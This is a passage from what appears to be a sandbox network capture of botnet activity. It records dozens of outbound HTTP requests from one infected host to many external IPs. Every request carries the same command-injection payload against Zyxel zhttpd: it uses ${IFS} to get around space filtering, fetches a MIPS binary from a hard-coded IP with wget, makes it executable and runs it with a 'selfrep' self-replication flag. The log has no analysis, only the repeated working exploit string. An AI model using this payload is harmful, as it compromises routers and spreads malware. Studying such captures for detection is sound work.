                                                Jan 12, 2024 18:24:28.659491062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2525192.168.2.1355392168.46.66.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.659518957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2526192.168.2.1360276176.161.62.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.659564018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2527192.168.2.134012497.42.137.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.659599066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2528192.168.2.1349710175.19.62.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.659631968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2529192.168.2.134757036.112.43.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.659692049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2530192.168.2.1337450144.46.5.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.659723997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2531192.168.2.1341748125.240.192.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.659753084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2532192.168.2.1353122196.163.126.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.659802914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2533192.168.2.135366861.136.194.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.659847021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2534192.168.2.1345710204.76.202.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.659871101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2535192.168.2.134519244.99.106.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.659918070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2536192.168.2.135825217.3.117.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.659962893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2537192.168.2.1360798176.200.189.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.659991026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2538192.168.2.133613444.189.7.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.660119057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2539192.168.2.133411876.44.103.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.660146952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2540192.168.2.134066094.239.168.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.660187960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2541192.168.2.1352416200.151.50.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.660216093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2542192.168.2.1360536153.78.53.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.660288095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2543192.168.2.1332964115.79.108.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.660322905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2544192.168.2.1358708200.6.180.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.660351038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2545192.168.2.1358880185.44.151.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.660382032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2546192.168.2.133862652.190.70.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.660410881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2547192.168.2.134506252.38.70.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.660502911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2548192.168.2.1343248143.255.46.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.660531044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2549192.168.2.1359618126.171.202.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.660571098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2550192.168.2.134142019.210.85.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.660608053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2551192.168.2.133731465.76.214.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.660626888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2552192.168.2.134029499.74.128.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.660691977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2553192.168.2.1341020220.35.187.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.660715103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2554192.168.2.1354824183.45.42.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.660787106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2555192.168.2.133343220.237.55.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.660804033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2556192.168.2.1338292160.101.190.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.660839081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2557192.168.2.1360414163.99.24.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.660839081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2558192.168.2.1342062121.212.227.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.660913944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2559192.168.2.1345920106.122.161.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.660913944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2560192.168.2.1357140194.196.30.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.660919905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2561192.168.2.136081681.182.3.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.660954952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2562192.168.2.1341082209.108.179.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.660969973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2563192.168.2.1335436177.208.222.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.661010981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2564192.168.2.1345232164.220.158.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.661053896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2565192.168.2.135491293.105.23.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.661082029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2566192.168.2.135723223.217.161.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.661122084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2567192.168.2.1354474219.166.249.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.661176920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2568192.168.2.134050647.235.157.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.661207914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2569192.168.2.1360108218.137.209.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.661253929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2570192.168.2.1354484206.58.9.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.661288977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2571192.168.2.1345084167.105.196.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.661341906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2572192.168.2.1333000211.13.156.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.661356926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2573192.168.2.133852494.62.105.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.661390066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2574192.168.2.135885488.174.36.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.661425114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2575192.168.2.1352156116.233.194.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.661492109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2576192.168.2.1339908100.244.14.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.661533117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2577192.168.2.1358508121.39.204.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.661575079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2578192.168.2.135498695.170.222.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.661601067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2579192.168.2.133483247.95.114.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.661655903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2580192.168.2.1344736163.161.111.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.661690950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2581192.168.2.1359692168.246.189.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.661725998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2582192.168.2.1354888124.164.216.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.661752939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2583192.168.2.135169876.157.47.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.661803961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2584192.168.2.136002224.179.34.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.661837101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2585192.168.2.135276447.143.30.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.661905050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2586192.168.2.1346212212.225.15.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.661927938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2587192.168.2.135125481.98.116.68443
                                                TimestampBytes transferredDirectionData
